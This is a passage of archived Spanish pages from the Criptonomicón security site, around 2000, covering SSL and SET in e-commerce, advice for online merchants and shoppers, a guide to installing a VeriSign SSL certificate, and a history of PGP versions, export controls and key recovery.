europeos no restringen la utilizacin de esta tcnica.
La incorporacin por parte del protocolo SET de los dos sistemas parece ser
la medida ms segura hasta el momento. Es un sistema hbrido (utiliza
ambos sistemas de cifrado) para evitar la lentitud de los sistemas de cifrado
asimtricos y aprovechar la rapidez del sistema simtrico. Se utilizan
adems las firmas digitales y las Autoridades de Certificacin o Thrusted
Third Parties, las cuales proporcionan al sistema el grado de confianza
necesario para poder realizar dichas transacciones electrnicas. Sin
embargo esta siendo lenta su implantacin. No obstante la Autoridad de
Certificacin Electrnica ACE (compuesta en un 40% por el Grupo
Telefnica, un 20% por CECA, un 20% por SERMEPA y un 20% por
SISTEMA 4B) ya esta emitiendo certificados SET a entidades financieras
Espaolas.
En la actualidad las principales compaas espaolas han optado por
incorporar nicamente el canal seguro de comunicacin o protocolo de
seguridad SSL, tanto para el pago con tarjetas de crdito como para la
introduccin de los datos bancarios:
El Corte Ingles ha puesto en funcionamiento el servicio de "la Tienda en
Casa" basado precisamente en SSL y en la tarjeta de cliente de El Corte
Ingls. Tras analizar los datos del cliente se procede a una comprobacin
telefnica personal para validar los datos.
Banesto ofrece un servicio similar basado en SSL y con la nueva tarjeta
Virtu@lCash. De esta manera el banco gestiona las transacciones entre los
clientes y los diferentes vendedores que se han apuntado a esta propuesta.
TSAI (filial de Telefnica) ofrece un servicio llamado Infomall similar a los
anteriores que posiblemente sea la continuacin de e-Christmas, una
iniciativa de comercio electrnico centrada en las compras en estas pasadas
Navidades con la colaboracin del Banco Santander. Parecido a este
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos38.html (3 of 5) [25/10/2000 02:31:05 p.m.]

Claves para la venta de productos o servicios a travs de Internet

Infomall se encuentra Hiper Red 2 S.A.


IBM ha anunci el 8 de Junio de 1998, en New York IBM Vault Registry,
una nueva solucin de certificado digital que incluye tecnologa de
identificacin para que los usuarios realicen operaciones e-business de
confianza.
Otros grandes almacenes como Alcampo, Continente y Caprabo han creado
o van ha crear pronto servicios similares a 'La Tienda en Casa'.
Como se puede ver existen muchas formas de seguridad actualmente
funcionando, quizs la ms utilizada sea el protocolo SSL, que otorga una
eficaz forma de cifrado de los nmeros de la tarjeta o de los datos bancarios,
pero no hemos de olvidar que es un protocolo seguro de comunicacin y por
tanto no un sistema de cifrado que garantice la confidencialidad,
autenticacin, integridad y no repudio del mensaje. Esta garantas slo se
consiguen por el momento con el protocolo SET, aunque IBM ha realizado
un magnfico esfuerzo en el tema de seguridad en las transacciones
electrnicas con el Vault Registry. Es por tanto una mera cuestin de tiempo
el poder comprobar la fiabilidad e implantacin de estos sistemas.
En definitiva la forma de pensar en cualquier tipo de seguridad nunca debe
ser absoluta, si no que se tratar de un problema de gestin del riesgo: es
decir, cunto (esfuerzo, dinero, incomodidad...) estoy dispuesto a invertir en
contrarrestar un cierto riesgo?
Publicado en el Boletn del Criptonomicn #38.
Fernando Ramos Surez es abogado especializado en Derecho Informtico, del
Departamento de Asesora Jurdica de ITEM (Informacin Tecnologa y Marketing
Consultores).

Informacin adicional

Cmo vender de forma inteligente en Internet

Cmo comprar de forma inteligente en Internet

Seguridad en el comercio electrnico: SSL o SET?

Seguridad en SSL, artculo publicado en iWorld.

SET a fondo, artculo publicado en iWorld.

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos38.html (4 of 5) [25/10/2000 02:31:05 p.m.]

Claves para la venta de productos o servicios a travs de Internet

E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos38.html (5 of 5) [25/10/2000 02:31:05 p.m.]

Cmo vender de forma inteligente en Internet

Consejos para
administradores
Consejos para
usuarios

Cmo vender de forma inteligente en


Internet
Hoy en da los potenciales compradores estn cada vez ms concienciados con la
seguridad. Si se duda en ofrecer SET a los clientes, entonces debe considerarse
seriamente la posibilidad de instalar SSL en el servidor para proteger al menos el
envo del nmero de tarjeta de crdito. Piensa que robusteciendo la seguridad de los
pagos se minimizarn los riesgos y llegars a un mercado mucho mayor: el 85% de
los usuarios de Internet, que todava dudan en hacer sus compras en lnea por
motivos de seguridad. Con SSL, podrs gestionar las compras en lnea de forma
segura, con autenticacin, confidencialidad de los datos intercambiados e integridad
en los mismos. Como consecuencia, reducirs el riesgo, aumentars la confianza de
los clientes y, en ltima instancia, ganars competitividad.
Si an no sabes qu debes hacer para empezar, lee el consejo anterior Cmo instalar
SSL en el servidor.
Despus, pon en prctica los siguientes consejos:
Cuida la seguridad de tu servidor, tanto fsica como lgica, ya que es tu
escaparate en el mundo: utiliza servidores redundantes para ofrecer servicio 24
horas al da durante 365 das al ao y crea una poltica de seguridad como
primer paso hacia la seguridad de tu sistema. Contrata los servicios de una
consultora si es necesario.
Instala SET, o como mnimo SSL, en tu servidor. Los usuarios desconfan de
los sitios inseguros. No debes perder clientes potenciales por este motivo.
Pon a disposicin de tus clientes una pgina sobre tu poltica de privacidad,
explicando qu haces con los datos privados que recabas.
S claro en la especificacin de tus productos, aade imgenes y proporciona
siempre informacin detallada acerca de precios, condiciones de garanta,
forma de envo y otras cuestiones tcnicas que tus potenciales compradores
valorarn.
Ofrece distintas formas para pagar, como tarjeta de crdito, contra reembolso,
etc. Deja que tus clientes decidan. No elijas por ellos, a todos no les gustan los
mismos mtodos.
Participa con tus consejos y trucos

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/vender.html (1 of 2) [25/10/2000 02:31:05 p.m.]

Cmo vender de forma inteligente en Internet

Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/vender.html (2 of 2) [25/10/2000 02:31:05 p.m.]

Cmo instalar SSL en un servidor

Consejos para
administradores
Consejos para
usuarios

Cmo instalar SSL en un servidor


Lo primero que debes hacer si quieres instalar SSL en tu servidor es disponer de
software de servidor web que lo soporte. Este aspecto no supone ningn problema,
ya que en la actualidad la prctica totalidad de servidores lo hacen. Consulta el
manual de tu servidor para saber si lo soporta. Si ests pensando en adquirir un
servidor nuevo, puedes consultar la pgina de WebServer Compare para conocer las
caractersticas de los servidores ms importantes en el mercado.
Si ya tienes tu servidor compatible SSL, el siguiente paso es hacerse con un
certificado digital. Lo primero que necesita es decidir a qu autoridad de certificacin
(AC) deseas comprrselo. Si no sabes qu autoridades de certificacin existen
actualmente operativas, puedes echar un vistazo a las que vienen preinstaladas en los
navegadores ms comunes, Netscape Communicator (Botn de Seguridad -->
Certificados --> Firmantes) e Internet Explorer (Ver --> Opciones de Internet -->
Contenido --> Certificados --> Sitios), que de hecho son las que tus potenciales
visitantes dispondrn a su alcance. Entre ellas se cuentan AT&T, GTE, MCI, Thawte
(informacin sobre precios de certificados en www.thawte.com/pricing.html),
VeriSign (informacin sobre precios de certificados en
www.verisign.com/enroll.s/payment.html), etc.
Por comodidad, puedes pedir un certificado de prueba gratuito, de 14 das de validez,
a VeriSign. El proceso general a seguir es el siguiente, que en esta entrega de
Consejos y trucos se particularizar para VeriSign:
1. Conctate con la pgina web de VeriSign para solicitud de certificados, donde
recibirs instrucciones paso a paso de lo que debes hacer, previo registro.
2. Genera una Solicitud de Firma de Certificado
Una Solicitud de Firma de Certificado (CSR) es un fichero que debes enviar a la
autoridad de certificacin para que lo firme y te lo devuelva en la forma de un
certificado. Bsicamente, contiene tu clave pblica que debe ser firmada por la AC
una vez haya verificado la veracidad de tus datos. Si no sabes cmo se genera, no te
preocupes, porque el proceso de registro de VeriSign te habr pedido previamente
para qu servidor deseas el certificado y te presentar consecuentemente las
instrucciones detalladas para cada tipo de servidor. Si tu servidor no se encuentra
entre los listados, entonces consulta el manual de software del servidor.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/instalarssl.html (1 of 3) [25/10/2000 02:31:05 p.m.]

Cmo instalar SSL en un servidor

Una vez que el software del servidor haya creado los dos ficheros (tus claves, pblica
y privada y el CSR, con la pblica), se te recomienda que realices un copia de
respaldo de ambos en un disquete, que debers almacenar en un lugar fsicamente
seguro. Recuerda: si pierdes tu clave privada, VeriSign no podr recuperarla.
3. Enva la Solicitud de Firma de Certificado a VeriSign
Abre el fichero Solicitud de Firma de Certificado en un editor de texto sencillo como
el bloc de notas (que no aada formato ni caracteres de control, como Word) y
selecciona el texto de la Solicitud, incluyendo las lneas --BEGIN NEW
CERTIFICATE REQUEST-- y --END NEW CERTIFICATE REQUEST--. Copia el
texto seleccionado y pgalo en el formulario de solicitud de VeriSign. Pulsa el botn
de Enviar.
4. Completa la solicitud
Rellena el formulario de solicitud con la informacin requerida acerca de tu
compaa y persona/s de contacto.
El contacto tcnico debe estar autorizado para administrar su servidor web y debe
estar empleado por tu compaa u organizacin. Si accedes a travs de un Proveedor
de Servicio Internet (ISP), el ISP necesita completar el formulario de solicitud en
lnea por ti. Lee el Acuerdo de Servicio de Servidor Seguro y si ests de acuerdo con
las condiciones, pulsa en el botn de Aceptar.
5. La autenticacin tarda algunos das
Mientras VeriSign comprueba los datos, se te enviar un correo incluyendo una
direccin web donde podrs comprobar el estado de tu solicitud, as como un nmero
de identificacin personal (PIN) para ver el estado. Si toda la informacin que
enviaste es correcta, recibirs tu Certificado de Servidor Seguro en unos pocos das.
Para el caso de certificado de prueba, se obvian estos pasos.
6. Instala tu Certificado de Servidor Seguro
Cuando recibas tu Certificado de Servidor Seguro por correo, salva el certificado a
un fichero de texto (incluyendo -----BEGIN CERTIFICATE----- y -----END
CERTIFICATE-----, haz una copia de seguridad y almacnalo en un disquete,
anotando la fecha en que lo recibiste. Guarda el disquete en un lugar fsicamente
seguro.
Para instalar el certificado en tu servidor, sigue las instrucciones que recibiste de
VeriSign cuando te registraste, que te guiarn paso a paso a lo largo del proceso, para
cada tipo de servidor. En caso de duda, consulta el manual de software del servidor.
La prxima vez que arranques el servidor (dependiendo del software), ya podrs
ofrecer comunicaciones seguras a tus visitantes en lnea.
Nota: Procesar pginas con SSL supone una sobrecarga para el servidor que puede
reducir su rendimiento. Por este motivo, te recomiendo que apliques SSL de forma
selectiva slo a aquellas pginas que necesiten cifrado, como las pginas de pago. No
file:///C|/TEMP/criptonomicon/criptonomicon/consejos/instalarssl.html (2 of 3) [25/10/2000 02:31:05 p.m.]

Cmo instalar SSL en un servidor

lo apliques a pginas de informacin de productos.


Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/instalarssl.html (3 of 3) [25/10/2000 02:31:05 p.m.]

Cmo comprar de forma inteligente en Internet

Consejos para
administradores
Consejos para
usuarios

Cmo comprar de forma inteligente en


Internet
Nunca deberas suministrar informacin confidencial por Internet sin ningn tipo de
proteccin, especialmente en lo que se refiere a datos financieros. Si est pensando
en comprar va web ese libro raro o esa coleccin de discos que slo encuentra en
una tienda en lnea, pero dudas a la hora de suministrar tu nmero de tarjeta de
crdito, has de saber cules son las opciones que se te presentan a la hora de hacerlo
de forma segura.
- No entregues ms informacin que la estrictamente necesaria para recibir el
producto que has comprado (normalmente no existe motivo para que debas responder
con tu renta anual o tus ideas religiosas).
- Nunca entregues datos confidenciales si no es a travs de un servidor seguro (que
utilice SSL).
- No enves tu nmero de tarjeta de crdito por correo electrnico.
- Comprueba rutinariamente los certificados de los sitios seguros a los que te
conectas. De nada sirve SSL si no se lo toma en serio.
- Reclama tus derechos como consumidor:
- Exige imgenes del producto que piensas adquirir, al menos cuando sea relevante.
- Exige informacin detallada y clara sobre los precios.
- Exige informacin sobre la forma de envo y coste adicional.
- Exige que te expliquen las condiciones de garanta y devolucin.
- Busca la pgina sobre poltica de privacidad del comercio, para saber qu se hace
con tu informacin privada, tanto la recopilada directamente, suministrada al rellenar
formularios, como la obtenida indirectamente por tu navegacin. Si no la encuentras,
exgela.
- No pagues en efectivo, ni con cheque, ni con tarjeta de dbito, mejor hazlo con
tarjeta de crdito. Es ms seguro de lo que generalmente se cree y te ocasionar
menos problemas en caso de irregularidades con la entrega de tu compra o fraude con
tu tarjeta. Consulta con tu banco las condiciones de resolucin de disputas con el

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/comprar.html (1 of 2) [25/10/2000 02:31:06 p.m.]

Cmo comprar de forma inteligente en Internet

comerciante. La entidad financiera de medios de pago te respalda. En caso de fraude,


el que tendr problemas ser el comercio en el que se hizo la compra con tu tarjeta, y
no t.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/comprar.html (2 of 2) [25/10/2000 02:31:06 p.m.]

Recelos y sospechas en el mundo PGP

Comercio electrnico

Criptologa y seguridad

Recelos y sospechas en el mundo PGP

Cuestiones legales

Por Arturo Quirantes Sierra

Intimidad y privacidad

Muchos son los caminos que llevan a PGP en particular y a la criptografa

Virus

en general. Algunos entramos en este mundillo preocupados por la falta de


privacidad de Internet. Otros comenzamos a interesarnos como un mero
pasatiempo matemtico. Hay quienes ven PGP como un garante de libertad
en el ciberespacio, un escudo eficaz contra la prepotencia del Gran
Hermano. La mayora de nosotros, un poco de todo.
Por qu PGP? Tal vez porque es el primer programa de cifrado de datos
disponible para el hombre de la calle, gratuito, fcil de usar y virtualmente
inviolable. Al redactarlo, Phil Zimmermann sac la criptografa de los crculos
de espionaje y la populariz hasta extremos insospechados anteriormente.
El deseo de proteger la intimidad en el nuevo mundo digital, ya sea por
motivos personales o comerciales, est haciendo el resto. Pero desde la
versin 1.0 han pasado casi diez aos, y eso en Internet es toda una
eternidad. Durante ese tiempo ha habido muchos cambios, y algunos no han
sido del agrado de la "vieja guardia". Se alzan voces de advertencia que a
veces no hacen ms que poner nerviosos a los recin llegados. Son
recomendables las nuevas claves Diffie-Hellman? Hay peligro en usar las
versiones PGP para Windows 95? Qu es esa historia de las puertas
traseras y la recuperacin de claves? Podemos fiarnos siquiera de PGP
ahora que el to Phil no controla su propia creacin? En qu quedan
aquellos tiempos de las copias "guerrilla" en tiempos de las versiones
comerciales?
Estas preguntas son como los malos de la pelcula, que apenas terminan los
ttulos iniciales entran, cometen sus fechoras y dejan al espectador ansioso
por saber si el bueno podr con ellos. Bueno, os voy a fastidiar el final de la
pelcula: PGP sigue siendo seguro. Si me crees, puedes irte a cargar otra
pgina (y gracias por tu ciega confianza). Personalmente, espero que te
quedes, porque el argumento es interesante. Para ponernos en
antecedentes, habr que bucear hasta los viejos tiempos. Me propongo
pasar velozmente por la era antigua para poder analizar la situacin actual.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (1 of 7) [25/10/2000 02:31:06 p.m.]

Recelos y sospechas en el mundo PGP

Como en la historia de la piratera, ha habido de todo. Y, teniendo en cuenta


la filosofa de "libertad contra el sistema" subyacente a PGP, la comparacin
no va muy desencaminada. Marchando una de piratas.
Los inicios de la "PGPiratera"
Fue en 1.991 cuando PGP versin 1.0 fue creada. La leyenda dice que, con
el temor de que la criptografa fuese declarada secreta, Phil Zimmermann
distribuy copias de su programa . Uno de sus amigos, por medio de
telfonos pblicos y mdem porttil, filtr una copia fuera de EEUU, en
flagrante violacin de la restricciones a la exportacin conocidas como ITAR,
y que considera la exportacin de programas de cifrado de datos en el
mismo nivel de peligrosidad que las armas nucleares, qumicas y
menudencias similares.
Esta accin le vali a Phil varios aos de acciones legales contra l por
violacin de los reglamentos de exportacin ITAR y por ciertos problemas
respecto a violacin de las patentes sobre los algoritmos de las claves RSA
que PGP utiliza. Pero el genio ya estaba fuera de la botella. Cada nueva
versin del programa se filtraba por la red a todo el mundo en cuestin de
microsegundos (bueno, puede que tardase un poco ms). El auge del primer
producto criptogrfico general de alta seguridad corra paralelo al de la
propia Internet.
La edad clsica: 2.6.x
Mientras Zimmermann sufra su calvario legal (del que, a la postre, saldra
limpio de polvo y paja), su programa se haca ms y ms popular. La versin
que podemos considerar definitiva para el sistema operativo DOS es la 2.6.x;
la x indica diversos valores. En Estados Unidos, la versin 2.6.2 fue
distribuida gratuitamente por el MIT. Para los usuarios de ultramar se
confeccion la versin 2.6.3i, que no es ms que la 2.6.2 (sacada de EEUU
ilegalmente) con una librera de software diferente. Ningn usuario poda
usar una versin que no le correspondiese: los norteamericanos deban usar
2.6.2 debido a problemas de patentes, y los dems deban usar la 2.6.3i por
las restricciones a la exportacin. Sin embargo, ambas versiones eran
funcionalmente idnticas, gratuitas y al alcance de todos.
Estas versiones no dejaban de tener sus inconvenientes, ya que eran
programas en DOS con diversos comandos algo difciles de memorizar y
aprovechar. Puesto que en esa poca el entorno operativo Windows 3.1
estaba imponindose, se crearon multitud de interfaces de usuario ("shells")
para facilitar su uso. Pero PGP estaba all, poda descargarse, instalarse y
utilizarse sin restricciones. James Bond dejaba paso a Pepe Cripto. Los
esfuerzos del gobierno norteamericano por evitarlo resultaron infructuosos, y
a la postre Phi Zimmermann fue exonerado de su responsabilidad en la
difusin de su programa a ultramar.
Windows 95 y la era de los doblones
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (2 of 7) [25/10/2000 02:31:06 p.m.]

Recelos y sospechas en el mundo PGP

Lleg el momento en el que Phil Zimmermann decide fundar su propia


empresa de software criptogrfico: PGP Inc. . Esto corresponde
aproximadamente a la poca en la que comienza a extenderse el sistema
operativo Windows 95. Y aqu comienzan los los. Su decisin no fue
acogida con indiferencia. Algunos consideraron razonable que quisiera sacar
provecho comercial de su propio programa, sobre todo despus de haberse
arriesgado a ir a la crcel y de haber puesto tanto esfuerzo desinteresado en
el pasado. Otros vean con tristeza cmo, de la etapa bucanera de "sin Dios
ni amo", se pasaba a las patentes de corso, la era de los doblones.
Cualquiera puede opinar como mejor le parezca. Despus de todo, seguira
habiendo versiones gratuitas para uso no comercial, aparte de las versiones
comerciales con soporte tcnico y las ventajas usuales. Por supuesto, los
que observbamos al otro lado de la frontera tenamos el nuevo mundo
vedado; la filtracin de la nueva versin 5.0 nos permita obtener el nuevo
programa, pero de modo irregular.
De haber sido slo eso, la cosa no habra ido a mayores. Pero la nueva
versin 5.0 gratuita con la que soaban los fieles de PGP fue una caja de
sorpresas, no todas ellas agradables. El paso a Windows 95 tuvo sus
ventajas, ya que permiti olvidarse de los engorrosos comandos de DOS y
los interfaces, que no siempre eran a gusto de todos (yo, al menos, nunca
encontr uno que me dejase contento). Por otro lado, Windows 95 no tiene
fama de ser un sistema operativo seguro: copias de seguridad, borrado
incorrecto, archivos de intercambio... en suma, diversas maneras por las que
se puede filtrar informacin. Justo es reconocer que cualquier programa de
infoseguridad tendra problemas similares bajo Windows 95. Pero dichos
problemas pueden paliarse mediante programas adecuados y estrategias de
seguridad sencillas, y por otro lado no preocupaban mucho al usuario en ese
momento.
El primer problema serio consista en que la versin PGP 5.0 para Windows
95 careca de las habituales opciones de cifrado/firmado de archivos. Si bien
PGP fue diseado con vistas a su uso con correo electrnico, las versiones
de DOS incorporaban la posibilidad de cifrar archivos mediante cifrado
convencional simtrico, que la nueva versin no inclua. La primera en la
frente.
La segunda fue mucho ms grave a ojos de muchos. Hasta entonces, la
arquitectura bsica de operacin de PGP era: algoritmo de claves RSA para
el cifrado de clave pblica, algoritmo IDEA para el cifrado simtrico y
"revoltillo" (hash) MD5 para la creacin de firmas digitales. El problema
fundamental subyacente para su aprovechamiento comercial consista en
que las claves RSA estaban protegidas por patentes. As que la versin 5.0
generaba y usaba otro tipo de claves, las llamadas Diffie-Hellman, o D-H (en
realidad, D-H es un protocolo de intercambio de claves; sera ms correcto
llamarlas claves ElGamal, pero por abuso del lenguaje se las llama claves

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (3 of 7) [25/10/2000 02:31:06 p.m.]

Recelos y sospechas en el mundo PGP

D-H).
Curiosamente, el esquema Diffie-Hellman es anterior en el tiempo al RSA,
pero no haba sido usado hasta entonces. Pero eso no acall las suspicacias
de los usuarios, acostumbrados a las claves antiguas. Esas suspicacias
crecieron cuando se supo que las nuevas claves D-H no usaban el algoritmo
de firma MD5, sino el nuevo SHA, creado por la temida/odiada Agencia de
Seguridad Nacional (NSA), la gigantesca agencia USA de espionaje de las
comunicaciones. Ironas de la vida, ahora se sabe que MD5 tiene ciertas
debilidades que, si bien no tiene relevancia prctica sobre la seguridad de
las firmas digitales con dicho algoritmo, s ha puesto nerviosos a muchos;
SHA parece ser un algoritmo mucho ms seguro a ese respecto.
Ese aparente coqueteo con sus antiguos acosadores de la NSA dio pie a
conjeturas no muy favorables. Pero cuando la comunidad de usuarios de
PGP explot fue cuando se comprob que la versin 5.0 gratuita, a
disposicin de millones de usuarios, !no permita la generacin ni la gestin
de claves RSA! Malo es que existan dos tipos de claves, aunque por lo
menos se puede elegir. Pero, de un plumazo, se neg esa posibilidad. O
tragas con Diffie-Hellman, o te quedas en tu vieja versin para DOS. La
intencin de PGP Inc., por supuesto, fue la primera; pero mucha gente opt
por la segunda opcin. A fin de cuentas, la imposibilidad de gestionar claves
RSA dejaba a un usuario PGP 5.0 imposibilitado de comunicarse con un
usuario de PGP 2.6.2/2.6.3i. Ambas versiones eran, en la prctica,
incompatibles. Qu juego es este? Dejar a millones de usuarios de las
versiones clsicas fuera de las nuevas tendencias? !Menuda jugarreta!
Entran los vikingos
Dnde entran aqu los vikingos? Bueno, no es ms que una amistosa
alusin al noruego Stale Schumacher. Este hombre, como muchos otros,
cay en la cuenta de las curiosas reglas norteamericanas sobre la
exportacin. La exportacin de programas de criptografa est prohibida, y
punto. Pero en su afn por proteger la libertad de prensa, los tribunales
dictaminaron que la exportacin del cdigo fuente escrito en papel est
protegido por la Segunda Enmienda y, en consecuencia, no se puede
prohibir. Es decir, t no puedes descargar el programa desde un servidor
norteamericano; pero s puedes viajar all, comprar una copia del cdigo
fuente, metrtela en tu bolsa de viaje y volverte tranquilamente a casa.
Lcito, legtimo y legal, aunque parezca digno de una pelcula de los
hermanos Marx.
Y adems, dos huevos duros. Schumacher vio en eso una manera infalible
de exportar el programa fuera de EEUU legalmente. Hasta entonces, las
versiones que circulaban en ultramar haban sido ilegalmente exportadas. Y,
aunque la distribucin del programa era legal una vez fuera de EEUU, el
regustillo de ilegalidad no gustaba a muchos. As que la idea que surgi fue:
comprar el cdigo fuente impreso, llevarlo fronteras afuera, someterlo a un
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (4 of 7) [25/10/2000 02:31:06 p.m.]

Recelos y sospechas en el mundo PGP

OCR (reconocimiento ptico de caracteres), recompilarlo y listo. Y as lo hizo


Stale.
De hecho, puede aprovecharse la oportunidad para modificar el programa,
por ejemplo, para permitirle crear y gestionar las antiguas claves RSA. Se
trataba tan slo de alterar un par de lneas de cdigo. Cuando finalmente la
versin 5.0 recompilada vio la luz bajo el nombre de 5.0i (i de Internacional),
los resultados fueron decepcionantes. Aparte de la posibilidad de gestionar
(pero no crear) claves RSA, no haba nada nuevo. Para poder crear claves
RSA haba que seguir manteniendo las antiguas versiones para DOS. Y para
colmo, los conectores (plug-in) que permitan una integracin de PGP con
programas de correo electrnico como Eudora ni siquiera aparecan en la
versin 5.0i; se alegaban cuestiones de tiempo, pero considerando lo que se
tard en recompilarlo, pareca una broma pesada.
Patentes de corso: NA y recuperacin de claves
La nueva versin, llamada PGP 5.5, resolvi muchos problemas, pero cre
numerosas incgnitas. Reapareci la posibilidad de cifrar y firmar archivos,
aparecieron nuevas y cmodas opciones para obtener claves pblicas
mediante servidores de claves, los plug-ins estaban incorporados para
diversos programas de correo electrnico. Y qu pasa con las antiguas
claves RSA? Reaparecen tambin. En realidad, la versin 5.5.5 (5.5 gratuita)
permita gestionar, pero no generar, dichas claves. La versin 5.5 comercial,
as como la 5.5.5 recompilada por Schumacher y rebautizada 5.5.3i,
permitan tanto gestin como creacin. Para acabar de bordar la faena, tanto
las claves RSA como las Diffie-Hellman podan elegir entre cualquiera de
tres algoritmos de clave simtrica asociada: IDEA, CAST y TripleDES.
Realmente, la empresa de Zimmermann se haba puesto a la altura.
Solo que ya no era la empresa de Zimmermann. Poco antes, PGP Inc. haba
sido absorbida por una empresa resultante de la fusin de otras, entre ellas
la antigua McAfee (s, la de los antivirus). La nueva empresa se llama
Network Associates (NA) Zimmermann se quedaba en ella como "fellow"
(que debe significar algo as como: sintate aqu, cobra, sonre y calla), pero
sin control sobre la nueva empresa. Cul sera el futuro de PGP bajo la
nueva empresa? Por supuesto, NAI lo utilizara como piedra angular de su
paquete de seguridad informtica. Pero, en el mejor de los casos, carecera
del benevolente control del "to Phil" porque ahora sera un mero producto
comercial, sujeto a las presiones de dicho mundo. Eso no es
necesariamente malo, aparte de hacer aflorar alguna criptolgrima a los
nostlgicos de los viejos tiempos.
Pero eso no era todo. Ya desde la versin 5.0 hubo quien pens que
Zimmermann se haba literalmente vendido. Acaso, decan, el gobierno le
ha dejado en paz a cambio de secretos y turbios favores? Quiz se
comprometi a dejar una "puerta abierta" para el FBI o la NSA a cambio de
inmunidad legal. Por supuesto, malpensados los hay por todas partes. Pero
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (5 of 7) [25/10/2000 02:31:06 p.m.]

Recelos y sospechas en el mundo PGP

la versin 5.5 contiene una, para muchos inquietante, nueva opcin, llamada
recuperacin corporativa de claves. La cuestin es la siguiente. NAI quiere,
evidentemente, ganar dinero, y una de las maneras ms efectivas es
vendiendo productos diseados para entornos empresariales. El problema
que se puede plantear es el siguiente. Si un particular compra PGP y lo usa
mal (por ejemplo, olvidando su contrasea), sobre su cabeza caiga. Sin
embargo, mal servicio hara a una empresa usar PGP si al tesorero de la
compaa lo atropella un autobs y, casualmente, es el nico que tiene la
contrasea para descifrar archivos vitales. Debe la empresa quedarse
ciega cuando un empleado le falta por enfermedad, vacaciones o despido?
La solucin consiste en cifrar los mensajes con dos claves: una del
empleado y otra de la empresa. Esta ltima, llamada "clave corporativa",
quedara en poder del administrador. En condiciones normales, no es
necesaria, pero en caso de necesidad se puede usar para descifrar la
correspondiente copia del mensaje o archivo de inters. Es como una
ganza maestra para casos de emergencia. Dejemos aparte el debate que
se gener sobre si el jefe tiene derecho o no a leer los mensajes de sus
empleados. La recuperacin de claves permita que alguien, adems del
usuario, tuviese la posibilidad de descifrar sus mensajes. Las consecuencias
son de mucho alcance. De qu sirve el criptoprograma ms potente de la
historia si un tipo al que no conoces puede leer tus mensajes? Qu pasa si
un juez obtiene el acceso a los mensajes por medio de una orden judicial
contra la empresa?
Por supuesto, las versiones no-corporativas no contienen esta posibilidad, e
incluso los programas para entorno empresarial lo incluyen de modo
opcional, no obligatorio. Pero es un paso fuera de la filosofa estilo Mulder:
no confes en nadie. En cualquier caso, las claves personales (privadas) de
uno no estn comprometidas. Lo nico que puede hacer el jefe es leer
mensajes cifrados con la clave corporativa; la clave del usuario sigue siendo
solamente del usuario.
Y ahora viene lo ms gordo. Cuando Network Associates compr PGP Inc.
formaba parte de una asociacin de empresas de software llamada Key
Recovery Alliance (Alianza para la Recuperacin de Claves). La KRA es un
"lobby" o grupo de intereses que favorece el establecimiento de "puertas
traseras" en los productos criptogrficos. Segn esto, el gobierno podra
obtener una copia de nuestra clave privada cuando le viniese en gana, o
bien acceder a nuestros mensajes cifrados por medio de una puerta trasera
imbuida en el software del programa. Que el programa de Zimmermann
contuviese mecanismos para recuperacin de claves era el colmo, e hizo
que muchos usuarios se replantearse el uso de versiones de PGP
posteriores a la 2.6.x para DOS.
Puesto que el cdigo fuente de los programas era an accesible, se pudo
comprobar que, de momento, las versiones 5.0/5.5 no cuentan con puertas
traseras. De hecho, Network Associates abandon la KRA debido a las
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (6 of 7) [25/10/2000 02:31:06 p.m.]

Recelos y sospechas en el mundo PGP

presiones de los usuarios. Pero una empresa con fuertes contratos con el
gobierno EEUU resulta ms vulnerable a "persuasin" que el idealista to
Phil. Podremos seguir findonos de versiones 6 y posteriores? Quin sabe.
Si la empresa contina ofreciendo el cdigo fuente para revisin, y si
consigue mantenerse al margen de las batallas que el FBI y la NSA llevan a
